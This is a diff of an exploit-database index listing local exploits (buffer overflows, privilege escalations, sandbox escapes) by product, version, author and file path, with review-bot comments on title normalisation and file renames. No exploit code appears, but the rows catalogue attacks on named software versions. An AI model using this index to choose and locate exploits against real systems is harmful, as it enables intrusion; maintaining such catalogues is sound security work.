(Metasploit)",2014-08-13,Metasploit,local,windows, -34331,exploits/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RET Buffer Overflow",2014-08-12,"Giovanni Bartolomucci",local,windows, +34331,exploits/windows/local/34331.py,"BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack Buffer Overflow",2014-08-12,"Giovanni Bartolomucci",local,windows, 34421,exploits/linux/local/34421.c,"glibc - NUL Byte gconv_translit_find Off-by-One",2014-08-27,"taviso & scarybeasts",local,linux, 
34489,exploits/windows/local/34489.py,"HTML Help Workshop 1.4 - Local Buffer Overflow (SEH)",2014-08-31,mr.pr0n,local,windows, 34512,exploits/windows/local/34512.py,"LeapFTP 3.1.0 - URL Handling Buffer Overflow (SEH)",2014-09-01,k3170makan,local,windows, @@ -8732,6 +8732,7 @@ id,file,description,date,author,type,platform,port 35661,exploits/windows/local/35661.txt,"Microsoft Windows 8.1 (x86/x64) - 'ahcache.sys' NtApphelpCacheControl Privilege Escalation",2015-01-01,"Google Security Research",local,windows, 35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,local,windows, 35681,exploits/linux/local/35681.txt,"OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation",2011-04-29,"Stephane Chauveau",local,linux, +35714,exploits/windows/local/35714.pl,"BlueVoda Website Builder 11 - '.bvp' Local Stack Buffer Overflow",2011-05-09,KedAns-Dz,local,windows, 35712,exploits/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow (Metasploit)",2015-01-06,Metasploit,local,windows, 35711,exploits/android/local/35711.c,"Nexus 5 Android 5.0 - Local Privilege Escalation",2015-01-06,retme,local,android, 35732,exploits/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,local,multiple, 
@@ -8743,7 +8744,7 @@ id,file,description,date,author,type,platform,port 35811,exploits/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - User Profile Service Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",local,windows, 35812,exploits/windows/local/35812.py,"T-Mobile Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows, 35813,exploits/windows/local/35813.py,"Congstar Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows, -35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",local,windows, +35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Local Stack Buffer Overflow",2015-01-16,"Osanda Malith",local,windows, 35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows, 35994,exploits/windows/local/35994.c,"BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows, 35847,exploits/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",local,osx, 
@@ -8832,7 +8833,7 @@ id,file,description,date,author,type,platform,port 40709,exploits/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation",2016-11-04,"Hector X. Monsegur",local,aix, 37543,exploits/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",local,linux, 37631,exploits/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",local,linux, -37657,exploits/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",local,windows, +37657,exploits/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",local,windows, 37670,exploits/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Local Privilege Escalation",2015-07-22,"Stefan Esser",local,osx, 37699,exploits/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",local,windows, 37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows, 
@@ -8887,7 +8888,7 @@ id,file,description,date,author,type,platform,port 38287,exploits/windows/local/38287.txt,"Kaspersky AntiVirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",local,windows, 38289,exploits/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Local Privilege Escalation",2015-09-22,"Google Security Research",local,windows, 38298,exploits/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",local,linux, -38299,exploits/windows/local/38299.txt,"Symantec Encryption Desktop 10 - Local Buffer Overflow / Privilege Escalation",2012-02-25,"Nikita Tarakanov",local,windows, +38299,exploits/windows/local/38299.txt,"Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation",2012-02-25,"Nikita Tarakanov",local,windows, 38303,exploits/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Local Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",local,osx, 38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple, 38319,exploits/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,local,windows, 
@@ -8905,7 +8906,7 @@ id,file,description,date,author,type,platform,port 38423,exploits/windows/local/38423.py,"VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",local,windows, 38456,exploits/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - Local Buffer Overflow (SEH)",2015-10-14,ArminCyber,local,windows, 38452,exploits/windows/local/38452.txt,"CDex Genre 1.79 - Local Stack Buffer Overflow",2015-10-13,Un_N0n,local,windows, -38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, +38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, 38472,exploits/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Local Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, 38473,exploits/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux, 38474,exploits/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",local,windows, 
@@ -8940,7 +8941,6 @@ id,file,description,date,author,type,platform,port 39010,exploits/linux/local/39010.c,"QEMU (Gentoo) - Local Privilege Escalation",2015-12-17,zx2c4,local,linux, 39035,exploits/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Local Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",local,win_x86-64, 39061,exploits/android/local/39061.txt,"GoToMeeting for Android - Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",local,android, -39102,exploits/windows/local/39102.py,"EasyCafe Server 2.2.14 - Remote File Read",2015-12-26,R-73eN,local,windows, 39112,exploits/linux/local/39112.txt,"QNX - '.Phgrafx' File Enumeration",2014-03-10,cenobyte,local,linux, 39120,exploits/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP / Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",local,windows, 39121,exploits/windows/local/39121.py,"KiTTY Portable 0.65.0.2p (Windows 7) - Local kitty.ini Overflow (Wow64 Egghunter)",2015-12-29,"Guillaume Kaddouch",local,windows, 
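Review bot: The removal of row 39102 ("EasyCafe Server 2.2.14 - Remote File Read") has no matching `+` line in this hunk, so from here the entry simply disappears from the local section. If the intent is to reclassify it from local to remote, check that the same commit re-adds id 39102 with type remote and a path outside exploits/windows/local/, and that the 39102.py file moves with it; otherwise the index row and the file fall out of sync.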
@@ -8956,8 +8956,8 @@ id,file,description,date,author,type,platform,port 39230,exploits/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Local Privilege Escalation (2)",2016-01-12,halfdog,local,linux, 39244,exploits/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",local,linux, 39260,exploits/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,local,windows, -39277,exploits/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",local,linux, -40003,exploits/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",local,linux, +39277,exploits/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)",2016-01-19,"Perception Point Team",local,linux, +40003,exploits/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)",2016-01-19,"Federico Bento",local,linux, 39284,exploits/windows/local/39284.txt,"Oracle - 'HtmlConverter.exe' Local Buffer Overflow",2016-01-21,hyp3rlinx,local,windows, 39285,exploits/linux/local/39285.py,"xWPE 1.5.30a-2.1 - Local Buffer Overflow",2016-01-21,"Juan Sacco",local,linux, 40337,exploits/win_x86-64/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",local,win_x86-64, 
@@ -8997,7 +8997,7 @@ id,file,description,date,author,type,platform,port 39675,exploits/osx/local/39675.c,"Apple Intel HD 3000 Graphics Driver 10.0.0 - Local Privilege Escalation",2016-04-08,"Piotr Bania",local,osx, 39680,exploits/windows/local/39680.txt,"CAM UnZip 5.1 - .'ZIP' File Directory Traversal",2016-04-11,hyp3rlinx,local,windows, 39692,exploits/linux/local/39692.py,"Texas Instrument Emulator 3.03 - Local Buffer Overflow",2016-04-13,"Juan Sacco",local,linux, -39694,exploits/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",local,windows, +39694,exploits/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",local,windows, 39702,exploits/linux/local/39702.rb,"Exim - 'perl_startup' Local Privilege Escalation (Metasploit)",2016-04-15,Metasploit,local,linux, 39967,exploits/linux/local/39967.txt,"SolarWinds Virtualization Manager - Local Privilege Escalation",2016-06-16,"Nate Kettlewell",local,linux, 39719,exploits/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,local,windows, 
@@ -9005,7 +9005,7 @@ id,file,description,date,author,type,platform,port 39734,exploits/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",local,linux, 39741,exploits/osx/local/39741.txt,"Mach Race OSX - Local Privilege Escalation",2016-04-27,fG!,local,osx, 39757,exploits/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation",2016-05-02,laginimaineb,local,android, -39764,exploits/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",local,linux, +39764,exploits/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow",2016-05-04,"Juan Sacco",local,linux, 39769,exploits/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",local,linux, 39771,exploits/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",local,linux, 39772,exploits/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",local,linux, 
@@ -9015,7 +9015,7 @@ id,file,description,date,author,type,platform,port 39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows, 39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",local,windows, 39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,local,windows, -39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",local,linux, +39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Overflow",2016-05-13,"Juan Sacco",local,linux, 39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,local,linux, 39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows, 39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows, 
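Review bot: The new title for 39810, "NRSS Reader 0.3.9 - Local Stack Overflow", drops "Based" but leaves the bug class ambiguous: "Stack Overflow" without "Buffer" can be read as stack exhaustion rather than a stack buffer overflow. If the PoC overwrites a stack buffer, use "Local Stack Buffer Overflow" so a search for "Buffer Overflow" finds the row; if it really is exhaustion, say so in the title.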
@@ -9033,7 +9033,7 @@ id,file,description,date,author,type,platform,port 40054,exploits/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,local,linux, 39980,exploits/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,local,windows, 39984,exploits/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,local,win_x86-64, -39992,exploits/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",local,linux, +39992,exploits/linux/local/39992.md,"Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux, 40017,exploits/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Local Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",local,windows, 40018,exploits/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,local,windows, 40020,exploits/windows/local/40020.txt,"Panda Security (Multiple Products) - Local Privilege Escalation",2016-06-27,Security-Assessment.com,local,windows, 
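Review bot: In the `+` line for 39992 the rewritten title "Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation" drops the "and" and leaves two quoted tokens side by side with nothing joining them. Keep a connective between them so it stays clear that the issue involves both. The same line also changes the path from 39992.txt to 39992.md, which is a separate change from the title cleanup and deserves its own mention in the commit message.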
@@ -9041,7 +9041,6 @@ id,file,description,date,author,type,platform,port 40025,exploits/linux/local/40025.py,"HNB 1.9.18-10 - Local Buffer Overflow",2016-06-27,"Juan Sacco",local,linux, 40039,exploits/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Local Privilege Escalation (MS16-014)",2016-06-29,blomster81,local,win_x86, 40040,exploits/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,local,windows, -40043,exploits/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",local,windows, 40049,exploits/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,local,lin_x86-64, 40066,exploits/android/local/40066.txt,"Samsung Android JACK - Local Privilege Escalation",2016-07-06,"Google Security Research",local,android, 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows, 
@@ -9061,7 +9060,7 @@ id,file,description,date,author,type,platform,port 40173,exploits/windows/local/40173.txt,"mySCADAPro 7 - Local Privilege Escalation",2016-07-29,"Karn Ganeshen",local,windows, 40203,exploits/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",local,linux, 40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows, -40224,exploits/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,local,windows, +40224,exploits/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)",2016-08-10,COSIG,local,windows, 40226,exploits/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,local,windows, 40268,exploits/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",local,windows, 40270,exploits/linux/local/40270.txt,"Watchguard Firewalls - 'ESCALATEPLOWMAN' ifconfig Privilege Escalation",2016-08-19,"Shadow Brokers",local,linux, 
@@ -9129,7 +9128,7 @@ id,file,description,date,author,type,platform,port 40636,exploits/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,local,windows, 40653,exploits/osx/local/40653.txt,"Apple OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",local,osx, 40655,exploits/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",local,windows, -40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Stack Buffer Overflow Callback / Privilege Escalation",2016-10-31,"Google Security Research",local,windows, +40660,exploits/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation",2016-10-31,"Google Security Research",local,windows, 40669,exploits/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Local Privilege Escalation",2016-10-31,"Google Security Research",local,macos, 40678,exploits/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",local,linux, 40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",local,multiple, 
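Review bot: The `+` line for 40660 still carries the unbalanced quote in "NvStreamKms 'PsSetCreateProcessNotifyRoutineEx", and inserting "Local" directly after the routine name makes the title harder to parse. Since the row is being touched anyway, close the quote after the routine name and keep "Callback" next to it. One "Local" is enough for a row whose type column already says local.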
@@ -9173,16 +9172,16 @@ id,file,description,date,author,type,platform,port 40995,exploits/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,local,windows, 41015,exploits/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys NtSetWindowLongPtr' Local Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",local,windows, 41020,exploits/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098)",2017-01-03,Saif,local,win_x86-64, -41021,exploits/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,local,multiple, +41021,exploits/multiple/local/41021.md,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,local,multiple, 41022,exploits/linux/local/41022.txt,"Firejail - Local Privilege Escalation",2017-01-09,"Daniel Hodson",local,linux, 41076,exploits/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",local,linux, 41090,exploits/windows/local/41090.py,"SentryHD 02.01.12e - Local Privilege Escalation",2017-01-18,"Kacper Szurek",local,windows, 41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android, 41144,exploits/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",local,windows, -41149,exploits/osx/local/41149.txt,"Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution",2017-01-23,"Filippo Cavallarin",local,osx, +41149,exploits/osx/local/41149.md,"Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution",2017-01-23,"Filippo Cavallarin",local,osx, 41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux, 41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos 
Research Ltd",local,linux, -41158,exploits/linux/local/41158.txt,"Man-db 2.6.7.1 - Local Privilege Escalation (PoC)",2015-12-02,halfdog,local,linux, +41158,exploits/linux/local/41158.md,"Man-db 2.6.7.1 - Local Privilege Escalation (PoC)",2015-12-02,halfdog,local,linux, 41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",local,linux, 41173,exploits/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Local Privilege Escalation",2017-01-26,"Federico Bento",local,linux, 41176,exploits/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",local,windows, 
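Review bot: Three rows in this hunk (41021, 41149, 41158) switch their file path from .txt to .md, mixed in with a title edit on 41149. A path change in the index is only correct if the files themselves are renamed in the same commit, and anything that resolves entries by the old path will miss them. Check that the three renames are part of the commit, and consider separating extension changes from title normalisation so each can be reviewed on its own.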
@@ -9208,7 +9207,7 @@ id,file,description,date,author,type,platform,port 41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android, 41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows, -41701,exploits/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)",2014-12-16,Metasploit,local,windows, +41701,exploits/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Code Execution (Metasploit)",2014-12-16,Metasploit,local,windows, 41702,exploits/windows/local/41702.rb,"Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)",2013-03-12,Metasploit,local,windows, 41704,exploits/windows/local/41704.rb,"EMC Replication Manager < 5.3 - Command Execution (Metasploit)",2011-02-27,Metasploit,local,windows, 41706,exploits/windows/local/41706.rb,"Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)",2015-12-08,Metasploit,local,windows, 
@@ -9306,7 +9305,7 @@ id,file,description,date,author,type,platform,port 42549,exploits/windows/local/42549.py,"Easy AVI DivX Converter 1.2.24 - Local Buffer Overflow (SEH)",2017-08-24,"Anurag Srivastava",local,windows, 42385,exploits/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,local,windows, 42407,exploits/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",local,multiple, -42418,exploits/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,local,windows, +42418,exploits/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit)",2017-08-02,Metasploit,local,windows, 42424,exploits/linux/local/42424.py,"DNSTracer 1.9 - Local Buffer Overflow",2017-08-03,j0lama,local,linux, 42425,exploits/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, 42426,exploits/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",local,windows, 
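Review bot: The context row for 42407 in this hunk still reads "Sandbox Escape Privelege Escalation". This change is a title-normalisation pass, so fix the spelling to "Privilege" here as well; as it stands, a search for "Privilege Escalation" skips that row.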
@@ -9319,7 +9318,7 @@ id,file,description,date,author,type,platform,port 42460,exploits/osx/local/42460.py,"NoMachine 5.3.9 - Local Privilege Escalation",2017-08-09,"Daniele Linguaglossa",local,osx, 42521,exploits/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Local Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",local,windows, 42536,exploits/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, -42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution",2017-08-21,"Daniele Votta",local,windows, +42537,exploits/windows/local/42537.txt,"PDF-XChange Viewer 2.5 Build 314.0 - Code Execution",2017-08-21,"Daniele Votta",local,windows, 42538,exploits/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, 42539,exploits/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Local Buffer Overflow",2017-08-22,"Anurag Srivastava",local,windows, 42540,exploits/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,local,windows, 
@@ -9331,10 +9330,10 @@ id,file,description,date,author,type,platform,port 42605,exploits/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Local Privilege Escalation",2017-09-02,ParagonSec,local,windows, 42611,exploits/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,local,linux, 42612,exploits/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",local,windows, -42624,exploits/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (1)",2017-09-06,mr_me,local,windows, +42624,exploits/windows/local/42624.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (1)",2017-09-06,mr_me,local,windows, 42625,exploits/windows/local/42625.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,local,windows, 42626,exploits/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",local,linux, -42665,exploits/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Privilege Escalation (2)",2017-09-12,mr_me,local,windows, +42665,exploits/windows/local/42665.py,"Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow / Local Privilege Escalation (2)",2017-09-12,mr_me,local,windows, 42718,exploits/windows/local/42718.rb,"MPlayer - '.SAMI' Subtitle File Buffer Overflow (DEP Bypass) (Metasploit)",2011-06-14,"James Fitts",local,windows, 42735,exploits/windows/local/42735.c,"Netdecision 5.8.2 - Local Privilege Escalation",2017-09-16,"Peter Baris",local,windows, 42777,exploits/windows/local/42777.py,"CyberLink LabelPrint < 2.5 - Local Buffer Overflow (SEH Unicode)",2017-09-23,f3ci,local,windows, 
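Review bot: "Local" is added to the two Jungo DriverWizard WinDriver pool-overflow rows (42624, 42665) but not to the row between them, 42625 "Kernel Out-of-Bounds Write Privilege Escalation", which has the same product, author and type. Either add "Local" there too or leave all three alone, so the normalisation is consistent within the set.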
